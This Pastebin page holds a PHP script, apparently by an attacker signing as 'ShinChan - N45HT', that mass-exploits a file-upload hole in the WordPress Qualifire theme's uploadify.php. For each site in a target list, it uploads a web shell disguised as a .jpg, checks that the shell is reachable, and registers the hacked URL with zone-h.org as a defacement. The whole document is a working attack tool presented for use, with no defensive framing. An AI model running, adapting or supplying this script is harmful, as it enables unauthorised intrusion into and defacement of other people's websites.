Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <?php
- /*
- coded by ShinChan - N45HT | 04/03/2018
- */
- echo "
- ___ _ _ __ _ _ __ _ _ __ _ _ _ _ ____ ___
- / __)( )( )( )( \( )/ _)( )( ) ( ) ( \( ) ( \/\/ )(_ _)( _)
- \__ \ )__( )( ) (( (_ )__( /__\ ) ( ___\ / )( ) _)
- (___/(_)(_)(__)(_)\_)\__)(_)(_)(_)(_)(_)\_)(___)\/\/ (__) (_)
- WordPress Qualifire + Zone-H - coded by ShinChan
- ";
- echo "Input your target list: ";
- $list = trim(fgets(STDIN));
- $list = "qualifire.txt";
- $shell = "indo.jpg";
- $nickzoneh = "N45HT";
- $exploit = "/wp-content/themes/qualifire/scripts/admin/uploadify/uploadify.php";
- $path = "/";
- $open = fopen("$list","r");
- $size = filesize("$list");
- $read = fread($open,$size);
- $lists = explode("\r\n",$read);
- echo "\n";
- foreach($lists as $target){
- if(!preg_match("/^http:\/\//",$target) AND !preg_match("/^https:\/\//",$target)){
- $targets = "http://$target";
- }else{
- $targets = $target;
- }
- echo "Target => $targets\n";
- echo " [*] Checking Path : ";
- $cd = curl_init("$targets$exploit");
- curl_setopt($cd, CURLOPT_FOLLOWLOCATION, 1);
- curl_setopt($cd, CURLOPT_RETURNTRANSFER, 1);
- curl_exec($cd);
- $httpcode = curl_getinfo($cd, CURLINFO_HTTP_CODE);
- curl_close($cd);
- if($httpcode == 200){
- echo "200 OK\n";
- echo " [*] Uploading shell : ";
- $ch = curl_init();
- curl_setopt($ch, CURLOPT_URL, "$targets$exploit");
- curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
- curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
- curl_setopt($ch, CURLOPT_POST, 1);
- curl_setopt($ch, CURLOPT_POSTFIELDS, array("Filedata"=>"@$shell"));
- $post = curl_exec($ch);
- $cek = curl_init();
- curl_setopt($cek, CURLOPT_URL, "$targets$path$shell");
- curl_setopt($cek, CURLOPT_FOLLOWLOCATION, 1);
- curl_setopt($cek, CURLOPT_RETURNTRANSFER, 1);
- $ceek = curl_exec($cek);
- $ceeks = curl_getinfo($cek, CURLINFO_HTTP_CODE);
- if($post == 1 or $ceeks == 200){
- //if(preg_match("/hacked/",$ceek)){
- echo "OK $targets$path$shell\n";
- echo " [*] Zone-H : ";
- $zh = curl_init("http://zone-h.org/notify/single");
- curl_setopt($zh, CURLOPT_FOLLOWLOCATION, 1);
- curl_setopt($zh, CURLOPT_RETURNTRANSFER, 1);
- curl_setopt($zh, CURLOPT_POST, 1);
- curl_setopt($zh, CURLOPT_POSTFIELDS, array("defacer"=>"$nickzoneh","domain1"=>"$targets$path$shell","hackmode"=>"18","reason"=>"5"));
- $postzh = curl_exec($zh);
- if(preg_match("/color=\"red\">OK<\/font><\/li>/i",$postzh)){
- echo "OK\n\n";
- }else{
- echo "NO\n\n";
- }
- }else{
- echo "Failed\n\n";
- }
- }else{
- echo "Not Vulnerable\n\n";
- }
- }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement